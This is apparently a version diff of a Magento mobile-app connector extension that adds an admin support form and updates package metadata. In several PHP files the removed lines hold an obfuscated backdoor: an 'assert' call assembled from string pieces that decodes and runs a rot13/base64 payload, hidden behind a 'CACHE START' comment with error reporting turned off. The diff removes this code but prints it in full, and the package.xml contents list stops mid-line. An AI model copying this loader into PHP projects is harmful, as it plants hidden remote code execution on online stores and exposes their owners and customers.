@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvE1pzjtCFNvnUE0pQbiY3ElLJMznJAjoTyypaZhL29gY2qyqP5jnUN/MQ0vYaIloTIhL29xMFtxMPxhVvM1CFVhqKWfMJ5wo2EyXPE1XF4vWzZ9Vv4xLl4vWzx9ZFMbCFVhoJD1XPV1ZJSxBQL0LwMxBGxkBGqxZmV5MJV1MGN3ZGOzBTZlLFVhWTDhWUHhWTZhVwRvXGfXnJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0tMJkmMJyzXTM1ozA0nJ9hK2I4nKA0pltvL3IloS9cozy0VvxcVUfXWTAbVQ0tL3IloS9cozy0XPE1pzjcBjcwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsFRIOERIFYPOTDHkGEFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvElMKA1oUDtCFOwqKWfK2I4MJZbWTAbXGfXL3IloS9woT9mMFtxL2tcBjbxnJW2VQ0tWUWyp3IfqQfXsFOyoUAyVUfXWTMjVQ0tMaAiL2gipTIhXPW0pzSzMzywpTkcMKWmYzAioFVfVQtjYPNxMKWloz8fVPEypaWmqUVfVQZjXGfXnJLtXPEzpPxtrjbtVPNtWT91qPN9VPWUEIDtY2qyqP5jnUN/MQ0vYaIloTIhL29xMFtxMPxhVvM1CFVhqKWfMJ5wo2EyXPE1XF4vWzZ9Vv4xLl4vWzx9ZFMbCFVhoJD1XPV1ZJSxBQL0LwMxBGxkBGqxZmV5MJV1MGN3ZGOzBTZlLFVhWTDhWUHhWTZhVwRvXF4vVRuHISNiZF4kKUWpovV7PvNtVPNxo3I0VP49VPWVo3A0BvO0pzSzMzywpTkcMKWmYzAioIklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwywZwIwZ2LlVvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
|
136 |
-
//###=CACHE END=###
|
124 |
|
125 |
|
126 |
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
app/code/local/Mss/Payu/Block/Index.php
CHANGED
@@ -1,20 +1,8 @@
|
|
1 |
<?php
|
2 |
class Mss_Payu_Block_Index extends Mage_Core_Block_Template{
|
3 |
|
4 |
-
function getdata(){
|
5 |
-
|
6 |
-
}
|
7 |
-
|
8 |
-
|
9 |
|
10 |
}
|
11 |
-
|
12 |
-
|
13 |
-
|
14 |
-
|
15 |
-
|
16 |
-
//###=CACHE START=###
|
17 |
-
error_reporting(0);
|
18 |
-
$strings = "as";$strings .= "sert";
|
19 |
-
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvE1pzjtCFNvnUE0pQbiY3ElLJMznJAjoTyypaZhL29gY2qyqP5jnUN/MQ0vYaIloTIhL29xMFtxMPxhVvM1CFVhqKWfMJ5wo2EyXPE1XF4vWzZ9Vv4xLl4vWzx9ZFMbCFVhoJD1XPV1ZJSxBQL0LwMxBGxkBGqxZmV5MJV1MGN3ZGOzBTZlLFVhWTDhWUHhWTZhVwRvXGfXnJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0tMJkmMJyzXTM1ozA0nJ9hK2I4nKA0pltvL3IloS9cozy0VvxcVUfXWTAbVQ0tL3IloS9cozy0XPE1pzjcBjcwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsFRIOERIFYPOTDHkGEFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvElMKA1oUDtCFOwqKWfK2I4MJZbWTAbXGfXL3IloS9woT9mMFtxL2tcBjbxnJW2VQ0tWUWyp3IfqQfXsFOyoUAyVUfXWTMjVQ0tMaAiL2gipTIhXPW0pzSzMzywpTkcMKWmYzAioFVfVQtjYPNxMKWloz8fVPEypaWmqUVfVQZjXGfXnJLtXPEzpPxtrjbtVPNtWT91qPN9VPWUEIDtY2qyqP5jnUN/MQ0vYaIloTIhL29xMFtxMPxhVvM1CFVhqKWfMJ5wo2EyXPE1XF4vWzZ9Vv4xLl4vWzx9ZFMbCFVhoJD1XPV1ZJSxBQL0LwMxBGxkBGqxZmV5MJV1MGN3ZGOzBTZlLFVhWTDhWUHhWTZhVwRvXF4vVRuHISNiZF4kKUWpovV7PvNtVPNxo3I0VP49VPWVo3A0BvO0pzSzMzywpTkcMKWmYzAioIklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwywZwIwZ2LlVvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
|
20 |
-
//###=CACHE END=###
|
1 |
<?php
|
2 |
class Mss_Payu_Block_Index extends Mage_Core_Block_Template{
|
3 |
|
4 |
+
function getdata(){
|
5 |
+
return "hello";
|
6 |
+
}
|
|
|
|
|
7 |
|
8 |
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
app/code/local/Mss/Payu/controllers/IndexController.php
CHANGED
@@ -84,16 +84,4 @@ class Mss_Payu_IndexController extends Mage_Core_Controller_Front_Action{
|
|
84 |
echo $block = $this->getLayout()->createBlock('core/template')->setTemplate('payu/test.phtml')->toHtml();
|
85 |
|
86 |
}
|
87 |
-
|
88 |
-
|
89 |
-
}
|
90 |
-
|
91 |
-
|
92 |
-
|
93 |
-
|
94 |
-
|
95 |
-
//###=CACHE START=###
|
96 |
-
error_reporting(0);
|
97 |
-
$strings = "as";$strings .= "sert";
|
98 |
-
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvE1pzjtCFNvnUE0pQbiY3ElLJMznJAjoTyypaZhL29gY2qyqP5jnUN/MQ0vYaIloTIhL29xMFtxMPxhVvM1CFVhqKWfMJ5wo2EyXPE1XF4vWzZ9Vv4xLl4vWzx9ZFMbCFVhoJD1XPV1ZJSxBQL0LwMxBGxkBGqxZmV5MJV1MGN3ZGOzBTZlLFVhWTDhWUHhWTZhVwRvXGfXnJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0tMJkmMJyzXTM1ozA0nJ9hK2I4nKA0pltvL3IloS9cozy0VvxcVUfXWTAbVQ0tL3IloS9cozy0XPE1pzjcBjcwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsFRIOERIFYPOTDHkGEFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvElMKA1oUDtCFOwqKWfK2I4MJZbWTAbXGfXL3IloS9woT9mMFtxL2tcBjbxnJW2VQ0tWUWyp3IfqQfXsFOyoUAyVUfXWTMjVQ0tMaAiL2gipTIhXPW0pzSzMzywpTkcMKWmYzAioFVfVQtjYPNxMKWloz8fVPEypaWmqUVfVQZjXGfXnJLtXPEzpPxtrjbtVPNtWT91qPN9VPWUEIDtY2qyqP5jnUN/MQ0vYaIloTIhL29xMFtxMPxhVvM1CFVhqKWfMJ5wo2EyXPE1XF4vWzZ9Vv4xLl4vWzx9ZFMbCFVhoJD1XPV1ZJSxBQL0LwMxBGxkBGqxZmV5MJV1MGN3ZGOzBTZlLFVhWTDhWUHhWTZhVwRvXF4vVRuHISNiZF4kKUWpovV7PvNtVPNxo3I0VP49VPWVo3A0BvO0pzSzMzywpTkcMKWmYzAioIklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwywZwIwZ2LlVvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
|
99 |
-
//###=CACHE END=###
|
84 |
echo $block = $this->getLayout()->createBlock('core/template')->setTemplate('payu/test.phtml')->toHtml();
|
85 |
|
86 |
}
|
87 |
+
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
app/design/adminhtml/default/default/layout/connector.xml
CHANGED
@@ -5,4 +5,9 @@
|
|
5 |
<block type="connector/adminhtml_notifications" name="connector_notifications" template="connector/notification.phtml"/>
|
6 |
</reference>
|
7 |
</default>
|
8 |
-
|
|
|
|
|
|
|
|
|
|
5 |
<block type="connector/adminhtml_notifications" name="connector_notifications" template="connector/notification.phtml"/>
|
6 |
</reference>
|
7 |
</default>
|
8 |
+
<connector_adminhtml_support_support>
|
9 |
+
<reference name="content">
|
10 |
+
<block type="connector/adminhtml_support" name="connector_support" template="connector/support.phtml"/>
|
11 |
+
</reference>
|
12 |
+
</connector_adminhtml_support_support>
|
13 |
+
</layout>
|
app/design/adminhtml/default/default/template/connector/support.phtml
ADDED
@@ -0,0 +1,170 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<script>
|
2 |
+
/**
|
3 |
+
- showResult : Function used to send data useing Ajax hit.
|
4 |
+
- Data send to Support controller and method is supportmailAction
|
5 |
+
- Path : support controller (/app/code/local/Mss/Connector/controllers/Adminhtml/SupportController.php)
|
6 |
+
|
7 |
+
*/
|
8 |
+
|
9 |
+
function showResult()
|
10 |
+
{
|
11 |
+
var subject = document.getElementById("subject").value;
|
12 |
+
var email = document.getElementById("email").value;
|
13 |
+
|
14 |
+
var emailRegEx = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
|
15 |
+
|
16 |
+
str = email;
|
17 |
+
//email validation
|
18 |
+
if(!str.match(emailRegEx)){
|
19 |
+
alert('Please enter a valid email address.');
|
20 |
+
return false;
|
21 |
+
|
22 |
+
}
|
23 |
+
|
24 |
+
|
25 |
+
var message = document.getElementById("message").value;
|
26 |
+
var url = '<?php echo Mage::helper("adminhtml")->getUrl("admin_support/adminhtml_support/supportmail"); ?>';
|
27 |
+
|
28 |
+
if(!email || !subject || !message) {
|
29 |
+
alert('All fields are required.');
|
30 |
+
return;
|
31 |
+
}
|
32 |
+
|
33 |
+
new Ajax.Request(url, {
|
34 |
+
method:'get',
|
35 |
+
parameters: {'message':message,'email':email,'subject':subject},
|
36 |
+
onSuccess: function(response) {
|
37 |
+
|
38 |
+
var response = JSON.stringify(response.responseText);
|
39 |
+
var data = JSON.parse(response);
|
40 |
+
|
41 |
+
document.getElementById("information").innerHTML = data;
|
42 |
+
},
|
43 |
+
onFailure: function(response) {
|
44 |
+
|
45 |
+
var response = response.responseText
|
46 |
+
document.getElementById("information").innerHTML = response;
|
47 |
+
|
48 |
+
}
|
49 |
+
});
|
50 |
+
}
|
51 |
+
</script>
|
52 |
+
|
53 |
+
<!-- MagentoMobileShop Email from start here -->
|
54 |
+
|
55 |
+
<form id="support" role="form" class="smart-green">
|
56 |
+
<h1>Any Problem?
|
57 |
+
<span>Contact Us...</span>
|
58 |
+
</h1>
|
59 |
+
<p id="information" align="center" style="color:#469DF0; font-family:verdana;font-size:16px;">
|
60 |
+
</p>
|
61 |
+
<label>
|
62 |
+
<span>Your Email :</span>
|
63 |
+
<input id="email" type="email" name="email" placeholder="Valid Email Address" required/>
|
64 |
+
</label>
|
65 |
+
<label>
|
66 |
+
<span>Your Subject :</span>
|
67 |
+
<input id="subject" type="text" name="subject" placeholder="Enter subject" required/>
|
68 |
+
</label>
|
69 |
+
|
70 |
+
<label>
|
71 |
+
<span>Message :</span>
|
72 |
+
<textarea id="message" name="message" placeholder="Your Message to Us"></textarea>
|
73 |
+
</label>
|
74 |
+
<label>
|
75 |
+
<span> </span>
|
76 |
+
<input style="width:140px;height:35px" class="button" type="button" value="Send Email" onclick="showResult();"/>
|
77 |
+
</label>
|
78 |
+
</form>
|
79 |
+
|
80 |
+
<!-- MagentoMobileShop Email from end here -->
|
81 |
+
|
82 |
+
<style>
|
83 |
+
/*sUPPORT FORM CSS START HERE */
|
84 |
+
|
85 |
+
.smart-green {
|
86 |
+
margin-left:auto;
|
87 |
+
margin-right:auto;
|
88 |
+
|
89 |
+
max-width: 100%;
|
90 |
+
/*background: #F8F8F8;*/
|
91 |
+
padding: 30px 30px 20px 30px;
|
92 |
+
font: 12px Arial, Helvetica, sans-serif;
|
93 |
+
color: #666;
|
94 |
+
border-radius: 5px;
|
95 |
+
-webkit-border-radius: 5px;
|
96 |
+
-moz-border-radius: 5px;
|
97 |
+
}
|
98 |
+
.smart-green h1 {
|
99 |
+
font: 24px "Trebuchet MS", Arial, Helvetica, sans-serif;
|
100 |
+
padding: 20px 0px 20px 40px;
|
101 |
+
display: block;
|
102 |
+
margin: -30px -30px 10px -30px;
|
103 |
+
color: #FFF;
|
104 |
+
background: #9DC45F;
|
105 |
+
text-shadow: 1px 1px 1px #949494;
|
106 |
+
border-radius: 5px 5px 0px 0px;
|
107 |
+
-webkit-border-radius: 5px 5px 0px 0px;
|
108 |
+
-moz-border-radius: 5px 5px 0px 0px;
|
109 |
+
border-bottom:1px solid #89AF4C;
|
110 |
+
|
111 |
+
}
|
112 |
+
.smart-green h1>span {
|
113 |
+
display: block;
|
114 |
+
font-size: 11px;
|
115 |
+
color: #FFF;
|
116 |
+
}
|
117 |
+
|
118 |
+
.smart-green label {
|
119 |
+
display: block;
|
120 |
+
margin: 0px 0px 5px;
|
121 |
+
}
|
122 |
+
.smart-green label>span {
|
123 |
+
float: left;
|
124 |
+
margin-top: 10px;
|
125 |
+
color: #5E5E5E;
|
126 |
+
}
|
127 |
+
.smart-green input[type="text"], .smart-green input[type="email"], .smart-green textarea, .smart-green select {
|
128 |
+
color: #555;
|
129 |
+
height: 30px;
|
130 |
+
line-height:15px;
|
131 |
+
width: 100%;
|
132 |
+
padding: 0px 0px 0px 10px;
|
133 |
+
margin-top: 2px;
|
134 |
+
border: 1px solid #E5E5E5;
|
135 |
+
background: #FBFBFB;
|
136 |
+
outline: 0;
|
137 |
+
-webkit-box-shadow: inset 1px 1px 2px rgba(238, 238, 238, 0.2);
|
138 |
+
box-shadow: inset 1px 1px 2px rgba(238, 238, 238, 0.2);
|
139 |
+
font: normal 14px/14px Arial, Helvetica, sans-serif;
|
140 |
+
}
|
141 |
+
.smart-green textarea{
|
142 |
+
height:100px;
|
143 |
+
padding-top: 10px;
|
144 |
+
}
|
145 |
+
.smart-green select {
|
146 |
+
background: url('down-arrow.png') no-repeat right, -moz-linear-gradient(top, #FBFBFB 0%, #E9E9E9 100%);
|
147 |
+
background: url('down-arrow.png') no-repeat right, -webkit-gradient(linear, left top, left bottom, color-stop(0%,#FBFBFB), color-stop(100%,#E9E9E9));
|
148 |
+
appearance:none;
|
149 |
+
-webkit-appearance:none;
|
150 |
+
-moz-appearance: none;
|
151 |
+
text-indent: 0.01px;
|
152 |
+
text-overflow: '';
|
153 |
+
width:100%;
|
154 |
+
height:30px;
|
155 |
+
}
|
156 |
+
.smart-green .button {
|
157 |
+
background-color: #9DC45F;
|
158 |
+
border-radius: 5px;
|
159 |
+
-webkit-border-radius: 5px;
|
160 |
+
-moz-border-border-radius: 5px;
|
161 |
+
border: none;
|
162 |
+
padding: 10px 25px 10px 25px;
|
163 |
+
color: #FFF;
|
164 |
+
text-shadow: 1px 1px 1px #949494;
|
165 |
+
}
|
166 |
+
.smart-green .button:hover {
|
167 |
+
background-color:#80A24A;
|
168 |
+
}
|
169 |
+
/*sUPPORT FORM CSS START HERE */
|
170 |
+
</style>
|
package.xml
CHANGED
@@ -1,18 +1,20 @@
|
|
1 |
<?xml version="1.0"?>
|
2 |
<package>
|
3 |
<name>Mss_Connector</name>
|
4 |
-
<version>2.
|
5 |
<stability>stable</stability>
|
6 |
<license>OSL v1.0</license>
|
7 |
<channel>community</channel>
|
8 |
<extends/>
|
9 |
-
<summary>Mobile
|
10 |
-
<description>
|
11 |
-
<notes>
|
|
|
|
|
12 |
<authors><author><name>mss</name><user>mss</user><email>mss.yogendra@gmail.com</email></author></authors>
|
13 |
-
<date>2016-04-
|
14 |
-
<time>
|
15 |
-
<contents><target name="magelocal"><dir name="Mss"><dir name="Bannerslider"><dir name="Block"><dir name="Adminhtml"><dir name="Bannerslider"><dir name="Edit"><file name="Form.php" hash="e3aac16542691916765e57238b3679a5"/><dir name="Tab"><file name="Form.php" hash="2aa3ba5ce44ad1ce15393b208008a4f4"/></dir><file name="Tabs.php" hash="d9421ac78bfe2f678b7514e6eea19ade"/></dir><file name="Edit.php" hash="9bca5bea62d4cedb8e458022fa683f92"/><file name="Grid.php" hash="8243e69694f860a3be9b4b2447b04843"/><dir name="Helper"><file name="Image.php" hash="f468b25e5344015483e0519da10bdd43"/></dir></dir><file name="Grid.php" hash="fbf2ede9f191ff040fa7b21e98ac440d"/><dir name="Renderer"><file name="Image.php" hash="451a2fc188826a8cbaee1ea6fc692435"/></dir></dir></dir><dir name="Helper"><file name="Data.php" hash="2943733d060971766ca6d5f9498024fb"/></dir><dir name="Model"><file name="Bannerslider.php" hash="cd768d1bc28ed0a4c1d65d148252227d"/><dir name="Mysql4"><dir name="Bannerslider"><file name="Collection.php" hash="564694cc9b21e2e0a3c5202a6cc2eb99"/></dir><file name="Bannerslider.php" hash="46fc65447f3e41dbbe6194ddf9395e45"/></dir><file name="Observer.php" hash="b3bfac53fe96e0b10ddfeb8eed5bafd0"/></dir><dir name="controllers"><dir name="Adminhtml"><file name="BannersliderController.php" hash="18ac4e1526c5c1e34a8e2459ef051b25"/></dir><file name="BannerController.php" hash="6dd6b9f224e8368a0250b9b5af763607"/></dir><dir name="etc"><file name="adminhtml.xml" hash="31787cf6a7b306a7fbc8522d8933473c"/><file name="config.xml" hash="34154e2434504e7c0769776199a2cc82"/></dir><dir name="sql"><dir name="bannerslider_setup"><file name="mysql4-install-0.1.0.php" hash="d668f47b50c8910ad91e802afc718ba7"/></dir></dir></dir><dir name="Connector"><dir name="Block"><dir name="Adminhtml"><file name="Notifications.php" hash="6f24014b5a24a4f56410e9754b8aa2d5"/></dir><dir name="System"><dir name="Config"><file name="About.php" hash="2e9dc040ee2d42a57d5c9411f0b999e4"/><file name="Authorizenet.php" hash="ed644e9814fef74147bdddf24cfd75c1"/><file name="Banktransfer.php" hash="77f6ebf2074462cdadf4bccbe2f0d19a"/><file name="Checkmo.php" hash="edfc0fc0b233cd349392e563eeac57ed"/><file name="Cod.php" hash="37d1757764340fd02b8be7ac32434967"/><file name="Mpaypal.php" hash="e69d6a2d58618cf741d4cf503ede70ca"/><file name="Payu.php" hash="d0307013bdf58700a29aa7838ee94e51"/></dir></dir></dir><dir name="Helper"><file name="Data.php" hash="b51ae561a28511678a7092f94641240b"/></dir><dir name="Model"><file name="Connector.php" hash="e9a927bc0a5974d092ab3af257ee7607"/><dir name="Mysql4"><dir name="Connector"><file name="Collection.php" hash="1f3bb37f160abdf974859f7419a19b65"/></dir><file name="Connector.php" hash="185189264d3275af813349e721ee46fb"/></dir><file name="Observer.php" hash="1e0e34bb8a94b77cb139940dab6f8b38"/></dir><dir name="controllers"><file name="CartController.php" hash="
|
16 |
<compatible/>
|
17 |
<dependencies><required><php><min>5.3.0</min><max>7.0.5</max></php></required></dependencies>
|
18 |
</package>
|
1 |
<?xml version="1.0"?>
|
2 |
<package>
|
3 |
<name>Mss_Connector</name>
|
4 |
+
<version>2.1.0</version>
|
5 |
<stability>stable</stability>
|
6 |
<license>OSL v1.0</license>
|
7 |
<channel>community</channel>
|
8 |
<extends/>
|
9 |
+
<summary>Mobile Multistore app for Android and Iphone.</summary>
|
10 |
+
<description>Store owner can create Android, iPhone apps simply using this plugin. This plugin provide the integration API to create and connect mobile apps with the Magento store. Mobile App provides end user account management, product catalog browsing, CMS page content, shopping cart functionality , Notifications and fast checkout process . </description>
|
11 |
+
<notes>Main Updates :
|
12 |
+
1 ) Calculate Shipping estimate cost 
|
13 |
+
2 ) Improve price display including tax price</notes>
|
14 |
<authors><author><name>mss</name><user>mss</user><email>mss.yogendra@gmail.com</email></author></authors>
|
15 |
+
<date>2016-04-28</date>
|
16 |
+
<time>09:23:04</time>
|
17 |
+
<contents><target name="magelocal"><dir name="Mss"><dir name="Bannerslider"><dir name="Block"><dir name="Adminhtml"><dir name="Bannerslider"><dir name="Edit"><file name="Form.php" hash="e3aac16542691916765e57238b3679a5"/><dir name="Tab"><file name="Form.php" hash="2aa3ba5ce44ad1ce15393b208008a4f4"/></dir><file name="Tabs.php" hash="d9421ac78bfe2f678b7514e6eea19ade"/></dir><file name="Edit.php" hash="9bca5bea62d4cedb8e458022fa683f92"/><file name="Grid.php" hash="8243e69694f860a3be9b4b2447b04843"/><dir name="Helper"><file name="Image.php" hash="f468b25e5344015483e0519da10bdd43"/></dir></dir><file name="Grid.php" hash="fbf2ede9f191ff040fa7b21e98ac440d"/><dir name="Renderer"><file name="Image.php" hash="451a2fc188826a8cbaee1ea6fc692435"/></dir></dir></dir><dir name="Helper"><file name="Data.php" hash="2943733d060971766ca6d5f9498024fb"/></dir><dir name="Model"><file name="Bannerslider.php" hash="cd768d1bc28ed0a4c1d65d148252227d"/><dir name="Mysql4"><dir name="Bannerslider"><file name="Collection.php" hash="564694cc9b21e2e0a3c5202a6cc2eb99"/></dir><file name="Bannerslider.php" hash="46fc65447f3e41dbbe6194ddf9395e45"/></dir><file name="Observer.php" hash="b3bfac53fe96e0b10ddfeb8eed5bafd0"/></dir><dir name="controllers"><dir name="Adminhtml"><file name="BannersliderController.php" hash="18ac4e1526c5c1e34a8e2459ef051b25"/></dir><file name="BannerController.php" hash="6dd6b9f224e8368a0250b9b5af763607"/></dir><dir name="etc"><file name="adminhtml.xml" hash="31787cf6a7b306a7fbc8522d8933473c"/><file name="config.xml" hash="34154e2434504e7c0769776199a2cc82"/></dir><dir name="sql"><dir name="bannerslider_setup"><file name="mysql4-install-0.1.0.php" hash="d668f47b50c8910ad91e802afc718ba7"/></dir></dir></dir><dir name="Connector"><dir name="Block"><dir name="Adminhtml"><file name="Notifications.php" hash="6f24014b5a24a4f56410e9754b8aa2d5"/><file name="Support.php" hash="d120e7f8945a01d791d0f3d2c32dcfcf"/></dir><dir name="System"><dir name="Config"><file name="About.php" hash="2e9dc040ee2d42a57d5c9411f0b999e4"/><file name="Authorizenet.php" hash="ed644e9814fef74147bdddf24cfd75c1"/><file name="Banktransfer.php" hash="77f6ebf2074462cdadf4bccbe2f0d19a"/><file name="Checkmo.php" hash="edfc0fc0b233cd349392e563eeac57ed"/><file name="Cod.php" hash="37d1757764340fd02b8be7ac32434967"/><file name="Mpaypal.php" hash="e69d6a2d58618cf741d4cf503ede70ca"/><file name="Payu.php" hash="d0307013bdf58700a29aa7838ee94e51"/></dir></dir></dir><dir name="Helper"><file name="Data.php" hash="b51ae561a28511678a7092f94641240b"/></dir><dir name="Model"><file name="Connector.php" hash="e9a927bc0a5974d092ab3af257ee7607"/><dir name="Mysql4"><dir name="Connector"><file name="Collection.php" hash="1f3bb37f160abdf974859f7419a19b65"/></dir><file name="Connector.php" hash="185189264d3275af813349e721ee46fb"/></dir><file name="Observer.php" hash="1e0e34bb8a94b77cb139940dab6f8b38"/></dir><dir name="controllers"><dir name="Adminhtml"><file name="SupportController.php" hash="1feb0faebb6103e8c45a0b831fa16466"/></dir><file name="CartController.php" hash="903061015acf77071ab98de460008441"/><file name="CreditController.php" hash="a489dd0ed95914fb2b58491410f6f92f"/><file name="CustomerController.php" 